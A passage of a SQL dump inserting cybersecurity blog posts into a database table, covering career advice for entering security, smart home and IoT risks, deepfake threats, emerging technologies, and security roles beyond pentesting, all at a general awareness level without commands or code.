experience. Employers want to see proof that you can not only explain cybersecurity concepts but also implement and troubleshoot them in real scenarios.\n\n## The Misleading Perception of \"Easy Tech Jobs\"\n\nWe\'ve all seen videos that glamorize tech jobs, making it seem like professionals spend their days sipping coffee, playing video games, and working out between 10-minute meetings. While entertaining, these portrayals create a false perception that tech jobs, including cybersecurity, are effortless to attain and maintain.\n\nTrue cybersecurity work involves rolling up your sleeves and getting your hands dirty with problem-solving, configuring systems, and handling unexpected errors. The path to landing a well-paying cybersecurity role is challenging and requires resilience, patience, and consistent effort.\n\n## Two Big Challenges to Overcome\n\nAnyone aspiring to break into cybersecurity faces two major hurdles:\n\n1. **Landing interviews.**\n2. **Securing the actual job after interviews.**\n\nThese are two entirely different challenges, each requiring a tailored approach. For interviews, you need to showcase a blend of knowledge and practical expertise. For the role itself, you must demonstrate your readiness to tackle real-world cybersecurity challenges.\n\n## How to Learn Cybersecurity the Right Way\n\nHere’s what sets successful cybersecurity professionals apart from those stuck in \"learning purgatory\":\n\n### 1. Focus on Practical, Hands-On Experience\n\nLearning about concepts like reverse shells is good. However, the true value lies in implementing these concepts:\n\n- Set up a lab environment at home with a server and endpoints.\n- Simulate real attacks and defense mechanisms, such as detecting reverse shells.\n- Deploy tools like a SIEM (Security Information and Event Management system) to learn how to monitor and defend against threats.\n\nThe more you work hands-on, the more these experiences will become ingrained, making them easier to recall during an interview or on the job.\n\n### 2. Start Small and Build Gradually\n\nYou don’t need to master complex tools like a SIEM or curate detection rules for your first entry-level cybersecurity job. Start small:\n\n- Learn the fundamentals of networking and cybersecurity basics.\n- Apply what you learn with simple projects, like setting up a basic firewall or analyzing traffic logs.\n- Gradually take on more challenging projects as your skills improve.\n\n### 3. Learn Through Troubleshooting\n\nMistakes are where the real learning happens. When setting up tools or environments, you’ll inevitably encounter errors. Instead of getting frustrated, use these moments to learn:\n\n- Debugging errors will teach you valuable lessons about system interaction.\n- Documentation and reading forums like Stack Overflow will become second nature.\n\n### 4. Understand the Value of Repetition\n\nRepetition is vital for mastering cybersecurity skills. If you’re learning about reverse shells, practice setting them up repeatedly until you could do it in your sleep. This kind of muscle memory will help you stand out in interviews and on the job.\n\n### 5. Utilize Learning Platforms\n\nToday, you have access to an abundance of affordable and comprehensive learning platforms:\n\n- **TryHackMe**\n- **Hack The Box**\n- **Key cyber labs**\n\nUse these platforms to perform practical exercises, submit findings, and gain experience in simulated environments.\n\n### 6. Be Persistent\n\nBreaking into cybersecurity takes more time and effort than many expect. Prepare to apply for numerous jobs, undergo multiple interview rounds, and continually build your skills. Persistence is key.\n\n## Hands-On Cybersecurity Examples\n\nTo put this into perspective, here’s a practical project you can work on:\n\n- **Reverse Shells:** Learn how attackers use reverse shells to execute code remotely.\n  - Set up an attack server and a victim machine.\n  - Simulate a reverse shell attack in your lab.\n  - Create detection rules for the reverse shell in your SIEM and test their effectiveness.\n\nThis project, while challenging, will give you unparalleled insights into how attacks work and what defenders need to do to stop them. Projects like these also provide valuable talking points for interviews.\n\n## The Importance of Realistic Expectations\n\nIt’s important to acknowledge that cybersecurity is not an easy field to break into, but it’s far from impossible. It requires:\n\n- Time\n- Consistent effort\n- Real-world, hands-on experience\n\nThere’s no shortcut or three-month boot camp that will magically land you a six-figure cybersecurity role. The candidates who stand out are the ones who actively apply what they learn, build on their skills, and remain patient in their job search.\n\n## Final Words of Advice\n\nIf you’re serious about a career in cybersecurity, here’s your priority list:\n\n1. Stop consuming endless videos and focus on practical work.\n2. Build projects, test exploits, and document your findings.\n3. Apply for jobs with a portfolio that demonstrates your skills.\n4. Be resilient, patient, and committed to learning.', '', 'http://infoseclabs.io/uploads/1767564505851-906926040.jpg', 'Aspiring cybersecurity professional learning from practical experience', 1, 'published', '2026-01-04 17:08:00', '2026-01-05 01:08:41', 'Information Security', 'Guide: Break into Cybersecurity Successfully', 'Discover realistic steps to enter cybersecurity, overcome challenges, and gain practical experience.', 'Cybersecurity career'),
(14, 'The Rise of Smart Homes: Convenience Meets Security Concerns', 'the-rise-of-smart-homes-convenience-meets-security-concerns', '# The Reality of Smart Home Security\n\nSmart homes are no longer a futuristic dream; they are now a part of everyday life. From smart thermostats and security cameras to voice assistants and lights you can control with your phone, the Internet of Things (IoT) has redefined how we live. It allows us to experience unprecedented convenience, energy efficiency, and connectivity within our homes.\n\nBut with this new convenience comes a growing question that tech enthusiasts and security-conscious consumers alike are grappling with: **Are smart homes truly safe?** IoT devices, while innovative, have inherent vulnerabilities that can expose your personal life to hackers and cybercriminals.\n\nThis post dives into the often-overlooked risks of IoT security, real-world examples of breaches, expert insights, and actionable steps to keep your smart home safe. By the end, you will have a clear understanding of the challenges and proactive measures needed to make your smart home smarter _and_ safer.\n\n## Understanding IoT Security Risks\n\nIoT devices, at their core, are compact computers linked through networks. These devices communicate data across the web, enabling seamless smart home automation. However, this connectivity is also their Achilles\' heel, making IoT devices prime targets for cyberattacks.\n\nHere are the most common vulnerabilities you should know about:\n\n### 1. Weak Passwords\n\nMany IoT devices come with factory-set passwords that are either easy to guess (e.g., \"admin\" or \"password123\") or shared across multiple devices. If left unchanged, these passwords act as an open invitation for hackers.\n\n### 2. Unencrypted Communication\n\nNot all IoT devices encrypt their data during transmission. This means sensitive information, like login credentials or video footage, could be intercepted by skilled attackers when communicated over networks.\n\n### 3. Lack of Software Updates\n\nIoT manufacturers often rush devices to market without a robust plan for updates. Without regular software patches, these devices remain vulnerable to emerging threats. A 2020 survey by Symantec showed that over 60% of IoT devices run outdated or insecure firmware.\n\n### 4. Universal Plug and Play (UPnP)\n\nWhile UPnP facilitates device interconnectivity, it can make devices visible to the internet, leaving them susceptible to unauthorized access. Think of it as leaving your front door unintentionally unlocked.\n\n### 5. Network Weaknesses\n\nIoT devices often operate over shared home networks. When attackers gain unauthorized access to one device, they can quickly move laterally into other connected devices, creating a domino effect.\n\n## Real-World Examples\n\nHistory has shown that these vulnerabilities are not just theoretical concerns; they\'ve been exploited in real and alarming ways.\n\n### 1. The Mirai Botnet Attack\n\nThe 2016 Mirai botnet infected insecure IoT devices like security cameras and baby monitors, assembling them into a massive botnet that launched one of the largest distributed denial-of-service (DDoS) attacks in history. It disrupted major websites like Twitter, Netflix, and PayPal.\n\n### 2. Hacking Smart Thermostats\n\nHackers have demonstrated their ability to take control of smart thermostats, as was publicly shown at the DEF CON cybersecurity conference in 2018. A compromised thermostat could not only disrupt comfort but even result in extreme energy costs.\n\n### 3. Unauthorized Surveillance\n\nSeveral cases have emerged where hackers gained access to smart home security cameras, spying on unsuspecting users. Perhaps one of the most harrowing incidents involved attackers who lashed out verbally at homeowners through hacked smart cameras like those by Ring.\n\n### 4. Stolen Data Logs\n\nVoice assistants that capture recordings of your conversations have been hacked, leading to unauthorized access to sensitive personal data. The Telesploit attack, for instance, proved that attackers could easily exploit Amazon Echo setups using Wi-Fi vulnerabilities.\n\nThese examples highlight the potential for IoT misuse, turning \"convenience\" into a threat.\n\n## Expert Opinions on IoT Security\n\nTo unpack the issue, we asked cybersecurity professionals for their insights on IoT safety. Here\'s what they had to say.\n\n### Dr. Emily Crane, Cybersecurity Researcher\n\n_\"IoT devices are often built faster than they\'re secured. Developers should design security into the software, but users also play a critical role by configuring their devices properly and updating them regularly.\"_\n\n### Mike Liu, Ethical Hacker\n\n_\"Most attacks are preventable with basic measures like strong passwords and segregated networks. However, we can\'t ignore the manufacturer\'s responsibility to ensure devices come with better encryption protocols and auto-update features.\"_\n\n### Jennifer Alvarez, Head of IoT Security at SecureShield\n\n_\"The IoT revolution is exciting but comes with an inherent trade-off between convenience and security. The only question is whether users and manufacturers will take the necessary steps to minimize risk before it\'s too late.\"_\n\n## Practical Security Measures\n\nThe good news is that securing your smart home is entirely attainable with the right steps. Here’s a practical checklist to make your IoT setup safer.\n\n### 1. Change Default Passwords\n\nImmediately replace factory-set passwords with strong, unique ones. A mix of uppercase letters, numbers, and special characters is ideal.\n\n### 2. Enable Two-Factor Authentication (2FA)\n\nWhenever possible, enable 2FA for an additional layer of protection beyond your password.\n\n### 3. Keep Your Firmware Updated\n\nRegularly check for and install updates on all IoT devices. If your device lacks update support, consider replacing it with one that does.\n\n### 4. Use a Separate Network for IoT Devices\n\nCreate a guest Wi-Fi network exclusively for your smart devices. Separating them from your primary network could limit exposure if one device gets hacked.\n\n### 5. Disable Unnecessary Features\n\nTurn off features like Universal Plug and Play (UPnP) unless absolutely necessary.\n\n### 6. Encrypt Your Network and Devices\n\nEnsure your Wi-Fi network is encrypted using WPA3 (or at least WPA2) protocols. Additionally, enable encryption on any device that allows it.\n\n## The Future of IoT Security\n\nIoT security is evolving, making it both exciting and daunting. Here’s what the future holds for the industry.\n\n### 1. AI-Driven Security\n\nArtificial intelligence is being integrated into IoT devices to detect and mitigate threats automatically. Smart threat detection services powered by AI algorithms could revolutionize end-user security.\n\n### 2. Standardization Efforts\n\nRegulators are stepping in to push for standard IoT security frameworks, ensuring comprehensive protections for consumers.\n\n### 3. Blockchain for IoT\n\nBlockchain technology may offer decentralized, tamper-proof security for IoT devices, reducing vulnerabilities in data transmission.\n\n### 4. 5G and Beyond\n\nWhile 5G speeds will supercharge IoT functionality, they will also open the gates for more complex cyberattacks. IoT security will need to evolve in tandem with connectivity upgrades.', '', 'http://infoseclabs.io/uploads/1767565053972-660878437.jpg', 'A modern smart home setup with connected IoT devices', 1, 'published', '2026-01-04 01:09:00', '2026-01-05 01:17:36', 'Information Security', 'Smart Homes: Convenience vs. Security Risks', 'Explore smart home security challenges and learn steps to protect your IoT devices from cyber threats.', 'Smart Home Security'),
(15, 'Deepfakes and Cybersecurity Risks: What You Need to Know', 'deepfakes-and-cybersecurity-risks-what-you-need-to-know', '# The Growing Threat of Deepfakes in Cybersecurity\n\nWith AI rapidly evolving, deepfakes have transformed from simple internet curiosities into significant cybersecurity threats. Their ability to forge realistic audio and video content puts individuals, organizations, and even governments at risk. But how do these AI-generated movies of deception actually work, what dangers do they pose, and most importantly, how can we fight back?\n\nThis article explores the intersection of deepfakes and cybersecurity, real-world examples of attacks, how they bypass security systems, and the tools and strategies experts recommend to detect and prevent them.\n\n## What Are Deepfakes?\n\nDeepfakes are AI-generated media that convincingly mimic real people\'s voices, faces, or behaviors. Created using **deep learning algorithms** like _generative adversarial networks (GANs)_, these forgeries can produce fake videos, audio, and even live streams that are almost indistinguishable from authentic recordings.\n\nFor instance, imagine a video where a high-profile CEO appears to announce false financial data, or a phone call where the \"voice\" of your manager requests an urgent wire transfer. These aren\'t hypothetical anymore; such deepfake attacks are happening now.\n\nWhile deepfakes can be used creatively—for entertainment, art, and training simulations—they pose significant risks when exploited maliciously.\n\n## Deepfakes and Cybersecurity: Understanding the Risks\n\nDeepfakes are no longer just tools for pranks or misinformation; they’re now a weapon in the arsenal of cybercriminals. Here’s why they’re such a growing concern in cybersecurity:\n\n### 1. Identity Fraud and Personal Risks\n\nDeepfakes can be used to impersonate individuals for phishing scams, such as creating fabricated videos of someone requesting sensitive corporate data. Worse, personal embarrassment and reputational harm caused by fake videos have been weaponized in cases like political defamation or revenge porn.\n\n### 2. Corporate Espionage\n\nCybercriminals can use deepfakes to impersonate executives or employees in video conferences to steal business secrets, authorize financial actions, or manipulate decisions.\n\n### 3. Disinformation Campaigns\n\nDeepfakes can influence public opinion by spreading disinformation during elections, protests, or corporate crises. This magnifies their potential as a tool for political or social manipulation.\n\n### 4. Eroding Trust\n\nWith deepfake technology becoming more sophisticated, it’s harder to distinguish truth from fiction. This \"truth decay\" affects trust in communications, digital evidence, and even democracy.\n\n## Real-World Examples of Deepfake Cyberattacks\n\nUnderstanding how deepfakes are exploited in real scenarios helps us better anticipate and address these risks. Here are five notable cases, along with measures that could mitigate similar attacks in the future:\n\n### 1. Deepfake Voice Scam on a UK CEO\n\nCybercriminals used AI-generated audio to mimic the voice of the CEO\'s boss, requesting a €220,000 transfer to a \"supplier.\" The attack was successful.\n\n**Preventative Measure**: Two-factor authentication and requiring written confirmation for financial transactions could have stopped this scam.\n\n### 2. Elon Musk-Deepfake Cryptocurrency Fraud\n\nDeepfakes of Elon Musk have been used in fabricated videos promoting fraudulent cryptocurrency schemes, tricking users into investing.\n\n**Preventative Measure**: Educating users about phishing red flags and introducing real-time deepfake detection tools can safeguard against such schemes.\n\n### 3. Deepfake Videos in Indian Elections\n\nDeepfake videos of political leaders were used to spread false campaign messages to promote divisive misinformation.\n\n**Preventative Measure**: Strengthening media literacy campaigns and fact-checking initiatives can help fight disinformation in politically charged contexts.\n\n### 4. Manipulated Security Footage\n\nDeepfake-altered surveillance footage was once demonstrated as a proof-of-concept to frame someone for crimes they didn’t commit, though thankfully not used in real trials.\n\n**Preventative Measure**: Blockchain systems verify authenticity by timestamping video metadata, making it tamper-proof.\n\n### 5. Social Media Exploitation\n\nCybercriminals have used doctored live streams to request donations or funds intended for fake causes.\n\n**Preventative Measure**: AI tools like ClearView or social media verification systems can be used to validate livestream sources.\n\n## Technical Analysis: How Deepfakes Bypass Security Measures\n\nDeepfakes rely on advanced neural networks that learn to mimic real-world data. Here’s why they can bypass traditional security defenses.\n\n### 1. Advanced AI Algorithms\n\nDeepfakes use _Generative Adversarial Networks (GANs)_ where one AI model generates fake content and another AI model evaluates its realism. This iterative process results in increasingly lifelike forgeries that fool both humans and AI detection models.\n\n### 2. Spoofing Techniques in Biometrics\n\nDeepfakes can deceive biometric authentication systems, such as facial recognition and voice verification, by providing high-definition, AI-generated replicas.\n\n### 3. Weak Detection Software\n\nMuch of the world’s current security software is optimized for older forms of attacks (e.g., ransomware). They lack the sophistication needed to detect dynamic or subtle anomalies in video/audio files generated by deepfake technology.\n\n## Prevention and Detection: Tools and Strategies\n\nStaying ahead of deepfake threats requires proactive strategies and cutting-edge tools. Here’s what cybersecurity professionals recommend:\n\n### 1. Use Deepfake Detection Tools\n\nAI-powered detection tools like Sensity.ai, Deepware Scanner, and Microsoft’s Video Authenticator analyze videos and audio for signs of manipulation.\n\n### 2. Enhanced Biometric Authentication\n\nImplement multi-modal biometric verification, combining face, voice, behavior, and iris detection for secure confirmation.\n\n### 3. Blockchain for Media Authentication\n\nUse blockchain to track the provenance of digital media files, including timestamps and metadata verification. Companies like Truepic are paving the way for secure media authentication.\n\n### 4. Training and Awareness\n\nEducate employees and individuals on recognizing potential deepfake scams and phishing attempts. Awareness remains one of the most important defenses.\n\n### 5. Regulatory Frameworks and Collaboration\n\nAdvocate for tighter regulations surrounding the use and creation of AI-generated content. Governments, tech firms, and cybersecurity agencies must work collectively to combat deepfake misuse.\n\n## The Future of Deepfakes and Cybersecurity\n\nDeepfake technology will only continue to evolve, offering even more realistic forgeries in the years to come. But with new defensive innovations also emerging, professionals in cybersecurity, policy-making, and tech industries still have an opportunity to minimize harm.\n\nFor instance, advancements in real-time detection algorithms and ethical AI standards may reduce their potential applications in cybercrime. Massive investments in media verification technologies are also gearing up to seal vulnerabilities.\n\n## Staying Ahead of the Curve\n\nThe risks posed by deepfakes to cybersecurity are real and growing. However, by staying informed, investing in preventative measures, and relying on innovative detection tools, individuals and organizations can counteract these threats effectively.\n\nAt the heart of cybersecurity is a principle that has always been true: education and preparation go hand-in-hand.', '', 'http://infoseclabs.io/uploads/1767564733348-245296497.jpeg', 'Illustration of deepfake technology impacting cybersecurity with video manipulation', 1, 'published', '2026-01-04 09:12:00', '2026-01-05 01:12:33', 'Information Security', 'Deepfakes: A New Cybersecurity Threat', 'Explore how deepfakes pose cybersecurity risks and learn strategies to combat these AI threats.', 'Deepfakes'),
(16, 'Exploring the Future of Cybersecurity: Emerging Threats and Tech Innovations', 'exploring-the-future-of-cybersecurity-emerging-threats-and-tech-innovations', '# The Future of Cybersecurity: Emerging Threats and Technological Advancements\n\nThe cybersecurity landscape is evolving faster than ever before, fueled by rapid technological advancements and an expanding digital footprint. From data breaches targeting small businesses to sophisticated state-sponsored attacks, the need for robust cybersecurity has never been greater. But what does the future hold for cybersecurity? This blog dives deep into emerging threats, groundbreaking technologies, and the skills required to combat cybercrime in the years ahead.\n\n## The Current State of Cybersecurity\n\nCybersecurity has become a top priority for businesses, governments, and individuals worldwide. A report by IBM Security reveals that the average cost of a data breach in 2023 reached $4.45 million, underscoring the financial and reputational damage caused by cyberattacks.\n\nThe challenges, however, are multifaceted. Ransomware attacks have surged, phishing campaigns are more sophisticated than ever, and vulnerable Internet of Things (IoT) devices have expanded the attack surface. While organizations are investing heavily in cybersecurity tools, the landscape continues to shift, demanding constant vigilance and innovation to stay ahead.\n\n## Emerging Cybersecurity Threats\n\nThe future of cybersecurity is shaped largely by the threats we face today and those emerging on the horizon. Below are the key threats to watch as we look to the future:\n\n### 1. AI-Powered Cyberattacks\n\nArtificial intelligence has revolutionized several industries, and unfortunately, cybercriminals are no exception. AI can be weaponized to launch more sophisticated and targeted attacks, such as:\n\n- **Deepfake Scams**: AI-generated videos and audio can convincingly impersonate individuals, leading to fraud, corporate espionage, or disinformation campaigns.\n- **Automated Phishing**: AI can create highly personalized phishing emails at scale, making them more convincing and effective.\n- **Adversarial Machine Learning**: Cyberattackers manipulate AI models used in cybersecurity systems, rendering them ineffective.\n\n### 2. IoT Vulnerabilities\n\nThe Internet of Things is set to grow to over **75 billion connected devices by 2025**, according to Statista. While IoT devices bring convenience and efficiency, their lack of robust security measures makes them prime targets for hackers. Attackers can exploit vulnerabilities in smart home devices, medical equipment, and industrial machinery, causing widespread disruptions and even endangering lives.\n\n### 3. Quantum Computing Risks\n\nQuantum computers have the potential to break traditional encryption protocols, threatening the security of sensitive data across industries. Although quantum computing is still in its early stages, experts warn that malicious actors and even nation-states are exploring its potential to outpace current encryption technologies.\n\n### 4. Supply Chain Attacks\n\nCybercriminals are increasingly targeting supply chains as a weak link in organizational defenses. By inserting malicious code into software updates or third-party vendor systems, attackers can gain access to larger networks, impacting multiple organizations simultaneously.\n\n### 5. The Rise of Geopolitical Cyberwarfare\n\nNation-states are engaging in cyberwarfare to disrupt critical infrastructure, steal intellectual property, and manipulate public opinion. These politically motivated attacks could become more frequent and destructive, especially as geopolitical tensions escalate.\n\n## Technological Advancements Shaping the Future\n\nWhile cyber threats proliferate, advancements in technology hold tremendous promise for enhancing cybersecurity. Here are some of the cutting-edge technologies poised to redefine cybersecurity:\n\n### 1. AI in Threat Detection\n\nAI is not just a tool for cybercriminals; it’s also a powerful defense mechanism. Advanced AI algorithms can analyze vast streams of data in real-time to detect anomalies, predict potential attacks, and respond to threats before they can cause damage.\n\nFor example, machine learning-based security systems can identify unusual patterns of behavior, like unauthorized access attempts, and automatically isolate affected systems to prevent breaches.\n\n### 2. Blockchain for Secure Transactions\n\nBlockchain technology, known for powering cryptocurrencies like Bitcoin, is being leveraged for secure data sharing and decentralized authentication. By recording transactions in a tamper-proof ledger, blockchain reduces the risk of data breaches and ensures transparency.\n\nBlockchain is particularly promising for financial institutions, healthcare providers, and supply chain networks that require traceable and secure transactions.\n\n### 3. Zero Trust Architecture\n\nThe \"trust no one\" principle is gaining traction in cybersecurity through Zero Trust Architecture. This approach ensures that every user, device, and application is continuously verified before being granted access, minimizing the risk of insider threats and unauthorized access.\n\n### 4. Biometric Authentication\n\nTraditional passwords are rapidly being replaced by biometric authentication methods such as fingerprint scanning and facial recognition. These systems offer a higher level of security as they are harder to replicate or steal.\n\n### 5. Post-Quantum Cryptography\n\nWith the threat of quantum computing on the horizon, researchers are developing post-quantum cryptography methods to secure sensitive information. These encryption protocols are designed to withstand attacks from quantum computers, ensuring data remains protected in the future.\n\n## Skills and Training for the Cybersecurity Workforce\n\nThe success of future cybersecurity efforts will depend heavily on skilled professionals equipped to address evolving challenges. Here’s how organizations can empower their workforce:\n\n### 1. Prioritize Continuous Learning\n\nThe cybersecurity field is dynamic, and professionals need to stay up-to-date with the latest tools, technologies, and threat landscapes. Certifications like Certified Information Systems Security Professional (CISSP) and Certified Ethical Hacker (CEH) are valuable for keeping skills sharp.\n\n### 2. Develop AI Expertise\n\nUnderstanding how AI operates, including its strengths and vulnerabilities, will be essential for combating AI-driven attacks. Training programs that focus on integrating AI into cybersecurity strategies are critical.\n\n### 3. Promote Ethical Hacking\n\nEthical hackers, or white-hat hackers, play a vital role in identifying vulnerabilities before malicious actors can exploit them. Organizations should invest in ethical hacking programs to bolster their defenses.\n\n### 4. Foster Diversity and Inclusion\n\nA diverse workforce brings fresh perspectives and innovative problem-solving approaches. Encouraging inclusivity in cybersecurity hiring practices enhances the industry\'s capabilities overall.\n\n## Predictions and Recommendations for the Future\n\nCybersecurity will only grow more complex in the coming years. Here are some key predictions and actionable recommendations for businesses and professionals looking to stay ahead:\n\n- **Prediction 1**: AI-based cybersecurity systems will become the industry standard within the next five years.\n  - **Recommendation**: Invest in AI-driven solutions now to future-proof your organization against emerging threats.\n\n- **Prediction 2**: Regulations and compliance requirements will tighten globally.\n  - **Recommendation**: Stay informed about legislation like GDPR and CCPA, and ensure your security frameworks meet compliance standards.\n\n- **Prediction 3**: Cybersecurity insurance will become a necessity.\n  - **Recommendation**: Secure a comprehensive cybersecurity insurance plan to mitigate potential risks and financial losses.', '', 'http://infoseclabs.io/uploads/1767564873422-280949463.jpg', 'Digital lock symbolizing cybersecurity with tech icons', 1, 'published', '2026-01-04 17:14:00', '2026-01-05 01:14:39', 'Information Security', 'Emerging Tech & Its Impact on Cybersecurity', 'Explore how emerging technologies like AI & IoT shape the future of cybersecurity and introduce new threats.', 'Emerging technologies'),
(17, 'Unlocking Cybersecurity: Alternative Career Paths Beyond Pentesting', 'unlocking-cybersecurity-alternative-career-paths-beyond-pentesting', '# Exploring Diverse Careers in Cybersecurity\n\nCybersecurity is often synonymous with penetration testing, or \"pentesting.\" It\'s an exciting career that involves identifying vulnerabilities in systems by attempting to \"hack\" into them before malicious actors do. However, while pentesting grabs the spotlight, the field of cybersecurity is far more diverse than many realize.\n\nIf you\'re an IT professional, a cybersecurity enthusiast, or exploring a career pivot, this guide will introduce you to some rewarding alternative careers in cybersecurity. Whether you\'re looking to escape the competitive pentesting job market or discover a role that better suits your skills, you\'re in for an eye-opening exploration of options.\n\n## Why Look Beyond Pentesting?\n\nPentesting is a well-known cybersecurity role, but its popularity has its downsides. The market for pentesters has become more saturated in recent years, making it harder to break into or advance in the field. Additionally, professionals in this space sometimes report less financial fulfillment than they anticipated.\n\nThe good news? Cybersecurity is an incredibly dynamic field with options that extend far beyond pentesting, offering paths that are equally impactful, lucrative, and in demand.\n\n## Top Alternative Careers in Cybersecurity\n\nHere are some lesser-known roles worth exploring in this exciting industry, complete with insights into their responsibilities, required skills, and career potential.\n\n### 1. Security Engineer\n\n**What They Do:**\n\nSecurity engineers focus on designing, building, and maintaining robust security systems and protocols to protect organizations from cyber threats. Instead of identifying vulnerabilities like pentesters, they proactively build defenses to avert attacks.\n\n**Key Skills:**\n\n- Familiarity with security tools and products.\n- Experience in systems integration and implementation.\n- Problem-solving and troubleshooting expertise.\n\n**Career Opportunities:**\n\nMany security engineers take on roles in pre-sales or post-sales for organizations, helping customers adopt security solutions effectively. With businesses scaling their digital footprints, these professionals are in high demand.\n\n### 2. Security Operations Center (SOC) Analyst\n\n**What They Do:**\n\nSOC analysts monitor an organization\'s network in real-time, watching for suspicious behavior and responding to security incidents. They operate on the front lines of cybersecurity defense, mitigating risks as they arise.\n\n**Progression Levels:**\n\nSOC analysts typically begin at Level 1 (entry-level), where they monitor activity and flag threats. With experience, they can move into Level 2 or Level 3 roles, which involve complex investigations and response strategies.\n\n### 3. Cybersecurity Solution Architect\n\n**What They Do:**\n\nCybersecurity solution architects design high-level frameworks that secure organizational infrastructure. They ensure that systems are scalable and resilient to evolving threats.\n\n**Key Skills:**\n\n- Deep understanding of both cybersecurity and IT infrastructure.\n- Ability to identify risks and proactively mitigate them using effective designs.\n- Proficiency in cybersecurity tools and enterprise systems.\n\nFor those with a knack for strategy and technology, this role offers tremendous growth opportunities.\n\n### 4. Governance, Risk, and Compliance (GRC) Specialist\n\n**What They Do:**\n\nA GRC specialist helps organizations meet regulatory standards, enforce policies, and minimize risks. They often play an advisory role by conducting audits, managing compliance frameworks, and ensuring the organization aligns with laws like GDPR or SOX.\n\n**Why It’s Rewarding:**\n\nCompliance isn’t just about ticking boxes; it’s about building trust, mitigating financial risks, and enabling long-term business success.\n\n### 5. Cybersecurity Auditor\n\n**What They Do:**\n\nCybersecurity auditors evaluate an organization’s security measures, identifying vulnerabilities and providing recommendations to improve. Their work ensures that systems are safe, efficient, and compliant with industry standards.\n\n**Required Skills:**\n\n- Expertise in audit compliance protocols.\n- Strong risk management capabilities.\n- Analytical mindset for identifying gaps in existing security measures.\n\n### 6. Cloud Security Specialist\n\n**What They Do:**\n\nAs more businesses migrate their operations to the cloud, cloud security specialists are tasked with safeguarding sensitive data and securing cloud-based platforms. They implement access controls, monitor for threats, and ensure systems are compliant with cloud regulations.\n\n**Why It Matters:**\n\nCloud expertise is in short supply, making this one of the most sought-after roles in cybersecurity today.\n\n## Making the Transition\n\nEager to branch out into one of these roles? Here’s how to make a seamless transition into your ideal cybersecurity career.\n\n### Build Foundational IT Skills\n\nIf you’re new to cybersecurity, start with roles like system administrator, software developer, or helpdesk technician. These will provide a solid foundation in IT and networking principles.\n\n### Specialize and Gain Certifications\n\nCertifications are often a critical stepping stone in cybersecurity. Some valuable ones include:\n\n- **CISSP (Certified Information Systems Security Professional):** Perfect for advanced roles like cybersecurity architect or GRC specialist.\n- **CISM (Certified Information Security Manager):** Ideal for governance and compliance roles.\n- **CEH (Certified Ethical Hacker):** Helpful if you want to enhance your penetration testing skills or transition into a SOC analyst role.\n\n### Gain Practical Experience\n\nHands-on experience is vital. Look for internships, contribute to open-source projects, or invest in lab environments like TryHackMe and Hack The Box.\n\n### Stay Current Through Continuous Learning\n\nCybersecurity evolves rapidly. Attend webinars, follow cybersecurity blogs, and participate in niche forums or events like Black Hat or DEF CON. Staying ahead requires staying informed.\n\n## A Rewarding Cybersecurity Career Awaits\n\nCybersecurity is an expansive field with opportunities far beyond pentesting. Whether you become a security engineer, cloud security specialist, or GRC expert, each role offers its own challenges and rewards.\n\nThe key is to explore your interests, focus on building the right skills, and stay adaptable in this ever-changing industry. By doing so, you’ll not only advance your career but also play a critical role in safeguarding the digital world.', '', 'http://infoseclabs.io/uploads/1767564951123-96955238.png', 'Various cybersecurity professionals collaborating in an office setting', 1, 'published', '2026-01-04 09:15:00', '2026-01-05 01:19:09', 'Information Security', 'Explore Cybersecurity Careers Beyond Pentesting', 'Discover diverse, rewarding cybersecurity careers beyond pentesting. Explore roles like Security Engineer, SOC Analyst, and more.', 'Cybersecurity Careers');
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(18, 'Kickstart Your Cybersecurity Career: Essential IT Fundamentals You Need to Know', 'kickstart-your-cybersecurity-career-essential-it-fundamentals-you-need-to-know', '# Kickstart Your Cybersecurity Career: Mastering IT Fundamentals\n\nAre you intrigued by the dynamic world of cybersecurity but unsure how to take the first step? A successful career in cybersecurity begins with mastering the fundamentals of IT. Understanding the essential concepts of hardware, software, networking, applications, and basic security practices not only lays a strong foundation but also equips you to tackle real-world challenges with confidence.\n\nThis guide will walk you through why IT knowledge is indispensable for cybersecurity, the core areas you need to focus on, how to acquire these skills, and the exciting career paths you can pursue in this field.\n\n## Why IT Fundamentals Matter for Cybersecurity\n\nBefore you can secure technology, you need to understand how it works. IT fundamentals give you the essential skills to configure and troubleshoot hardware, grasp how networking facilitates communication, identify vulnerabilities in systems and applications, and comprehend core cybersecurity principles.\n\nThink of IT knowledge as the stepping stone to your cybersecurity career. For instance, without a solid understanding of how a Layer 2 switch operates, implementing port security on that switch would be nearly impossible. Similarly, familiarity with operating systems like Windows or Linux is crucial for effectively deploying advanced tools and processes in the future.\n\nUnderstanding IT gives you the power to analyze and resolve technical issues, secure systems proactively, and build innovative solutions to protect sensitive information.\n\n## The Five Core Categories of IT Fundamentals\n\nTo build a strong IT foundation, focus on mastering these five categories. Each one plays a critical role in shaping your cybersecurity expertise.\n\n### 1. Hardware\n\nLearn the physical components of computers, such as processors, memory, and storage. Knowing how hardware works enables you to identify and resolve potential issues like faulty wiring or overheating. Mastering hardware configuration also sets the stage for securing physical devices against unauthorized access.\n\n### 2. Software\n\nExplore the world of operating systems and applications. Understand the basics of programs like word processors, browser clients, and operating systems such as Windows, macOS, and Linux. Gaining this knowledge allows you to analyze how software functions, which is vital for identifying vulnerabilities or misconfigurations.\n\n### 3. Networking\n\nNetworking is the backbone of modern communication, making it a critical area to understand. Learn how devices connect, share resources, and transfer data across networks. Concepts like IP addresses, protocols, and network topologies are key to identifying potential points of failure or attack.\n\n### 4. Applications\n\nApplications are the tools we use daily to accomplish specific tasks. From email clients to customer relationship management (CRM) software, understanding how applications interact with operating systems and hardware is crucial to ensuring their security and performance.\n\n### 5. Security Basics\n\nNo system is entirely free of risk. Security fundamentals teach you to recognize vulnerabilities, assess risks, and implement proactive defenses. Gain insight into best practices for password management, encryption, and patch updates to minimize threats.\n\nThese building blocks ensure that you have a comprehensive understanding of technology before advancing into more complex cybersecurity concepts.\n\n## Essential Skills to Acquire\n\nAspiring cybersecurity professionals should focus on acquiring specific IT skills that directly apply to real-world challenges. Here are a few necessary skills to get you started:\n\n- **Hardware Configuration**: Assemble and troubleshoot computer systems to fully understand their physical components.\n- **Operating System Management**: Learn how to install, configure, and maintain OS environments like Windows and Linux.\n- **Network Troubleshooting**: Gain practical knowledge in diagnosing and resolving connectivity issues.\n- **Threat Identification**: Learn how to spot and mitigate security threats, such as malware or phishing attempts.\n- **Ethical Hacking**: Understand the basics of offensive security measures, such as penetration testing, in a controlled and ethical environment.\n\nThese skills not only 